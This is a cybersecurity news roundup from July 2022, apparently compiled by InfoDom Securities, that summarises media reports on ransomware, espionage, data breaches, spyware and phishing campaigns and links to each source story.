Saturday, July 23, 2022 // (IG): BB //Weekly Sponsor: The Fintel Brief
FBI investigation determined Chinese-made Huawei equipment could disrupt US nuclear arsenal communications
FROM THE MEDIA: On paper, it looked like a fantastic deal. In 2017, the Chinese government was offering to spend $100 million to build an ornate Chinese garden at the National Arboretum in Washington DC. Complete with temples, pavilions and a 70-foot white pagoda, the project thrilled local officials, who hoped it would attract thousands of tourists every year. But when US counterintelligence officials began digging into the details, they found numerous red flags. The pagoda, they noted, would have been strategically placed on one of the highest points in Washington DC, just two miles from the US Capitol, a perfect spot for signals intelligence collection, multiple sources familiar with the episode told CNN.
READ THE STORY: CNN
Cyber-attacks on Port of Los Angeles have doubled since pandemic
FROM THE MEDIA: The number of monthly attacks targeting the Port of Los Angeles is now around 40 million, the port's executive director Gene Seroka told the BBC. Los Angeles is the busiest port in the western hemisphere, handling more than $250bn (£210bn) of cargo every year. The threats are believed to come mainly from Europe and Russia, and aim to disrupt the US economy, Mr Seroka said. "Our intelligence shows the threats are coming from Russia and parts of Europe. We have to stay steps ahead of those who want to hurt international commerce," he told the BBC's World Service.
READ THE STORY: BBC
Growing Cannabis Industry a Prime Target for Cyberattacks
FROM THE MEDIA: Cannabis is becoming a flashpoint for investment as the U.S. stands on the brink of legalization. Ohio alone is set to open dozens of new medical dispensaries in the coming months, thanks to the release in May of 70 new provisional licenses by state regulators. “Pay us one million dollars, or your plants die.” It sounds like something out of a low-rate, slapstick thriller. However, cybersecurity is no joke. Just look at the continuing fallout from the SolarWinds attack, or the aftermath of the Colonial Pipeline attack during May 2021. And don't forget what happened in June 2021, when hackers crippled operations of the world's largest meat processing company.
READ THE STORY: Crains Cleveland
How Conti ransomware hacked and encrypted the Costa Rican government
FROM THE MEDIA: Details have emerged on how the Conti ransomware gang breached the Costa Rican government, showing the attack's precision and the speed of moving from initial access to the final stage of encrypting devices. This is the last attack from the Conti ransomware operation before the group transitioned to a different form of organization that relies on multiple cells working with other gangs. The Conti ransomware operation launched in 2020 to replace Ryuk and quickly grew to infamy after attacking victims in both the private and the public sector, including local governments in the U.S., schools, and national healthcare systems.
READ THE STORY: BleepingComputer
The 2022 US Midterm Elections’ Top Security Issue: Death Threats
FROM THE MEDIA: IN THE LEAD-UP to the 2018 midterm elections in the United States, law enforcement, intelligence, and election officials were on high alert for digital attacks and influence operations after Russia demonstrated the reality of these threats by targeting the presidential elections in 2016. Six years later, the threat of hacking and malign foreign influence remain, but 2022 is a different time and a new top-line risk has emerged: physical safety threats to election officials, their families, and their workplaces.
READ THE STORY: Wired
Hacker selling Twitter account data of 5.4 million users for $30k
FROM THE MEDIA: Twitter has suffered a data breach after threat actors used a vulnerability to build a database of phone numbers and email addresses belonging to 5.4 million accounts, with the data now up for sale on a hacker forum for $30,000. Yesterday, a threat actor known as ‘devil’ said on a stolen data market that the database contains info about various accounts, including celebrities, companies, and random users.
READ THE STORY: BleepingComputer
Malware aimed at industrial engineers discovered
FROM THE MEDIA: There’s no shortage of tools offered on the internet to help people solve problems. But some are really malware. According to researchers at Dragos, one is password cracking software for programmable logic controllers (PLCs), Human-Machine Interface (HMI) applications, and project files, which is offered on multiple social media sites. In some cases it will retrieve a password, the researchers said in a blog this week — but only if the PLC application has a vulnerability that can be exploited. Meanwhile, in the background, the tool is installing a malware dropper, infecting the machine with the Sality malware and turning the host into a peer in Sality’s peer-to-peer botnet.
READ THE STORY: ITworld Canada
‘Cyber-mercenaries’ sought by new cybercrime operation
FROM THE MEDIA: Threatpost reports that the new for-hire cybercrime operation Atlas Intelligence Group, also known as Atlantis Cyber-Army, has been enlisting the services of "cyber-mercenaries" or independent unethical hackers to conduct specific aspects of attacks targeted at government assets in the U.S. and other parts of the world since its emergence in May. Several services including distributed denial-of-service attacks, remote desktop protocol hijacking, data leaks, and network penetration services are being offered by A.I.G., which is being led by Mr. Eagle, who also promotes the services, according to a report from Cyberint.
READ THE STORY: SCMAG
Hacked Ukrainian Radio Stations Broadcast Fake News About President Zelensky’s Health
FROM THE MEDIA: Ukrainian radio stations were hacked this week by threat actors to spread fake news about President Volodymyr Zelensky’s health, according to Ukraine’s security officials. A music program on “at least one” out of TAVR Media’s stations – one of Ukraine’s largest radio networks – was interrupted by the false reports just after midday on July 21. The so-far unidentified hackers broadcasted reports that Zelensky was hospitalized “in an intensive care ward” and that he was temporarily deputizing his presidential responsibilities to Ruslan Stefanchuk, Chairman of the Ukrainian parliament.
READ THE STORY: InfoSecMag
Conti's fate and effects
FROM THE MEDIA: In the course of a discussion with Advanced Intelligence over the firm's study of Conti's attack against Costa Rican networks, BleepingComputer offers a useful summary of what's happened to the gang. It's effectively rebranded through dispersal, its alumni now working for the Quantum, Hive, AvosLocker, BlackCat, and Hello Kitty gangs. Security Boulevard calls these "splinter RaaS [ransomware-as-a-service] groups."
READ THE STORY: CyberWire
Espionage and counterespionage during the hybrid war
FROM THE MEDIA: Traditional espionage run by intelligence officers working under diplomatic cover has grown somewhat more difficult for Russia during the present war. The Record quotes the head of Britain's MI6 as estimating that around half, roughly four hundred in total, of the Russian intelligence officers so operating in Europe have been expelled. Clearing compromised personnel from Ukrainian security and intelligence services is a more complex and difficult task. The Atlantic Council describes the challenges of expunging Russian sympathizers from the SBU security service and the Prosecutor General’s Office (PGO). The heads of both agencies have been suspended, but reforming large agencies in wartime is like rebuilding a ship during a voyage.
READ THE STORY: CyberWire
Snowballing Ransomware Variants Highlight Growing Threat to VMware ESXi Environments
FROM THE MEDIA: The latest confirmations of the growing attacker interest in VMware ESXi environments are two ransomware variants that surfaced in recent weeks and have begun hitting targets worldwide. One of the malware tools, dubbed Luna, is written in Rust and can encrypt data on ESXi virtual machines (VMs) in addition to data on Linux and Window systems. The other is Black Basta, a rapidly proliferating ransomware variant written in C++ that, like Luna, targets ESXi VMs and also works on Windows and Linux systems as well.
READ THE STORY: DarkReading
Malware: On sale for the price of a pint on dark web
FROM THE MEDIA: The dark web has made cyber crime accessible even to those with only “rudimentary” IT skills, with malware available to buy for less than $10, around £8.50, a new report by forensic experts Forensic Pathways and security platform HP Wolf Security has found. The dark web – a group of websites only accessible via special routing software, usually Tor – gives cyber criminals “an anonymous online environment” where they “can collaborate, organise, hone their skills and establish illicit shops”, the report says.
READ THE STORY: NewStatesMan
LinkedIn most impersonated brand in phishing attacks
FROM THE MEDIA: Workplace social network LinkedIn has emerged as the brand most imitated by cyber criminals in their phishing attacks for the second quarter in a row, accounting for 45% of all phishing attacks in the three-month period to the end of June 2022, according to a Check Point Research report. In its Brand phishing report for Q2 2022, Check Point’s threat research arm highlights how social networks in general are the most imitated brand category, followed by technology companies and then shipping. The past three months saw a “striking rise” in big name technology companies being exploited, with Microsoft now making up 13% of all brand phishing attempts to place second, edging out DHL, which accounted for 12% of brand phishing emails.
READ THE STORY: ComputerWeekly
Malware Attacks In Ukraine Continue
FROM THE MEDIA: Hacked radio stations made to broadcast disinformation and unique malware targeted at a tech company whose software is used by state agencies are just the latest examples of the barrage of malware facing Ukrainian network defenders. It's not quite cyberwar, but as the Russian incursion into Ukraine grinds onward, so does the a barrage of malware attacks in Kyivean cyberspace. The second quarter of this year saw a "significant ramp up" of malware intended to steal and destroy data, says the State Service of Special Communications and Information Protection of Ukraine. It estimates malware incidents are up by 38%, compared to first three months of the year.
READ THE STORY: BankInfoSec
Cheap malware kits put channel under pressure
FROM THE MEDIA: The channel knows it’s often seen as the vital provider of cyber defenses by customers, but the idea that malware can be purchased for the price of a pint is a sobering thought that shows the ease with which threats can be shared around the dark web. HP is altering the channel to the findings of its report, The evolution of cybercrime: Why the dark web is supercharging the threat landscape and how to fight back. The main revelation was the extent to which malware was being spread through “plug-and-play” kits that often cost very little.
READ THE STORY: MicroScope
Google blocks website of largest computing society over malware claims
FROM THE MEDIA: Google Search and Drive erroneously marks links to research papers and websites of the Association for Computing Machinery (ACM) as malware. Google Search results for the ACM website, ACM Digital Library research papers, and contact pages mark links to ACM domains as malicious, which means clicking on one of the acm.org, dl.acm.org or libraries.acm.org links lead to an “interstitial” that is hosted on Google’s redirect page and warns users of malicious activity associated with the identified site. The problem is blocking all traffic to ACM domains from Google Search results. To navigate the issue, ACM visitors must manually copy and paste the intended link into the address bar of their web browser.
READ THE STORY: ITworld Canada
US Defense Contractor L3Harris Drops Plan To Buy NSO Group Despite Allegedly Having The Defense Department’s Backing
FROM THE MEDIA: A couple of weeks ago, news leaked of a match made in hell: the acquisition of toxic asset/exploit developer NSO Group by defense contractor L3Harris. The “Harris” part of the contractor’s name refers to none other than Harris Corporation, the manufacturer of Stingray cell tower spoofers and an entity that often found itself described as “controversial” or “embattled.” Good news, everyone! The wedding is off, according to this report from Ellen Nakashima for the Washington Post.
READ THE STORY: TechDirt
Google Chrome Zero-Day Weaponized to Spy on Journalists
FROM THE MEDIA: A zero-day vulnerability in Google Chrome was used by the established spyware group Candiru to compromise users in the Middle East — specifically journalists in Lebanon. Avast researchers said attackers compromised a website used by news agency employees in Lebanon, and injected code. That code identified specific, targeted users and routed them to an exploit server. From there, the attackers collect a set of about 50 data points, including language, device type, time zone, and much more, to verify that they have the intended target.
READ THE STORY: DarkReading
‘Living Off the Cloud’: Hackers Modernize an Old-School Tactic
FROM THE MEDIA: An old threat is new again — or never really went away.
As governments and other players increasingly turn to the cloud, malicious actors are following, adding “living off the cloud” attacks back into their repertoires.
Living off the land ploys see hackers use phishing or other methods to gain access to a victims’ networks, then use the victims’ own tools and services for malicious purposes. These attacks are particularly subtle and date back to at least 2013, according to cybersecurity firm Darktrace.
READ THE STORY: GOVTECH
Hackers hiding malicious links in top Google search results, researchers warn
FROM THE MEDIA: Google users have been warned of a new malvertising campaign in which people searching for popular websites are instead redirected to scam sites by malicious adverts. Searches for some of the most popular websites were found to produce adverts that had been crafted to appear as if they were legitimate links to the desired website, with some appearing as the first listing on a results page. Websites mimicked by the threat actors include YouTube, Amazon, Facebook and Walmart, and in all cases appear to lead to a browser locker website where users are given scam warnings to call Microsoft support, or fake alerts from Windows Defender, according to researchers at Malwarebytes.
READ THE STORY: TechCentral
The Cybersecurity Dark Threat Facing Universities
FROM THE MEDIA: A peek at Microsoft’s Global Threat Activity tool may surprise you. In the past 30 days, the Education sector has reported more malware encounters than any other industry. With nearly 6 million threats in Education alone, the Retail and Consumer Goods sector is a distant second with under 640,000 incidents. Universities and colleges are easy targets. As early adopters of computers and the internet, many Higher Ed institutions still maintain legacy computers and infrastructure that limit the implementation of adequate cybersecurity.
READ THE STORY: SecurityBoulevard
China’s attempts to control citizen data risk exposure
FROM THE MEDIA: China is currently dealing with what might be the largest data breach in the country’s history, despite the fact that lawmakers have built one of the world’s tightest cybersecurity and data-protection systems. The Wall Street Journal explores how the government’s extensive surveillance network has made it a target for data theft. According to database tracking service LeakIX, China has tens of thousands of unprotected databases exposed on the internet totaling more than 700 terabytes of data, the largest volume of exposed data of any country. What’s more, the data are especially sensitive in nature, largely due to the way China aggregates data from multiple sources in its state-run surveillance platforms.
READ THE STORY: CyberWire
Google Chrome security update fixes 'high risk' flaws
FROM THE MEDIA: Google has released security updates for Google Chrome browser for Windows, Mac and Linux, addressing vulnerabilities that could allow a remote attacker to take control of systems. There are 11 fixes in total, including five that are classed as high-severity. As a result, CISA has issued an alert encouraging IT administrators and regular users to install the updates as soon as possible to ensure their systems are not vulnerable to the flaws.
READ THE STORY: ZDNET
Thai Minister Says Spyware Used for National Security, Drug Dealers
FROM THE MEDIA: A Thai minister has acknowledged the use of surveillance software to track those involved in “national security or drug matters,” but stated that it was only used in “limited and special cases.” Chaiwut Thanakamanusorn, Minister of Digital Economy and Society, told parliament on Tuesday that he was aware of the use of spyware but did not disclose which software was used and against whom.
READ THE STORY: Epoch Times
A small Canadian town is being extorted by a global ransomware gang
FROM THE MEDIA: The Canadian town of St. Marys, Ontario, has been hit by a ransomware attack that has locked staff out of internal systems and encrypted data. The small town of around 7,500 residents seems to be the latest target of the notorious LockBit ransomware group. On July 22nd, a post on LockBit’s dark web site listed townofstmarys.com as a victim of the ransomware and previewed files that had been stolen and encrypted.
READ THE STORY: Theverge
U.S. Seizes Crypto Funds from North Korean Ransomware Attack
FROM THE MEDIA: U.S. authorities seized approximately half a million dollars worth of cryptocurrency from North Korean hackers that targeted healthcare providers, according to a Department of Justice announcement on Tuesday. U.S. officials have attributed two healthcare facility ransomware attacks to North Korean hackers. (Photo: kalhh, Pixabay, License)The hackers used a new strain of ransomware, known as ‘Maui’, to encrypt the files and servers of a medical center in Kansas in 2021, locking users out of the system until the ransom was paid. The hospital paid the hackers $100,000 worth of bitcoin to regain access to their servers.
READ THE STORY: OCCRP
Items of interest
The Beginner’s Guide to Attack Paths
FROM THE MEDIA: According to Gartner, worldwide security and risk management spend will reach $150 billion in 2021. In another report by Cybersecurity Ventures, cybersecurity spend could reach as high as $1.75 trillion. With all the tools and increased security spend, one would expect that security teams feel confident and secure in protecting their assets. Yet today’s security teams are overwhelmed with the volume of alerts, struggling with siloed security findings, and finding it near impossible to determine which findings are critical and require immediate remediation and which ones don’t.
Could today’s security teams be going about security all wrong?
The future of protecting multi-cloud environments with a variety of layers and with a whole host of attack vectors means that a future solution must also be multi-faceted. It should be contextual and relate findings across multiple layers. It should be intuitive and able to prioritize findings while also surfacing them in a visual way. It should be sophisticated in nature by anticipating the moves of a hacker rather than simply rehashing existing vulnerabilities.
READ THE STORY: SecurityBoulevard
Try Hack Me Review(Video)
FROM THE MEDIA: In this video we review Try Hack Me.
0day Shares His Journey on Becoming #1 on TryHackMe (Video)
FROM THE MEDIA: Ryan AKA 0day is currently the #1 hacker on TryHackMe's platform. In this episode of Live Recon, 0day talks about his experience, what it takes to stay at the top of the TryHackMe leaderboard, resources to learn, and more!
These open source products are reviewed from analysts at InfoDom Securities and provide possible context about current media trends in regard to the realm of cyber security. The stories selected cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not specifically endorse any third-party claims made in their original material or related links on their sites, and the opinions expressed by third parties are theirs alone. Contact InfoDom Securities at dominanceinformation@gmail.com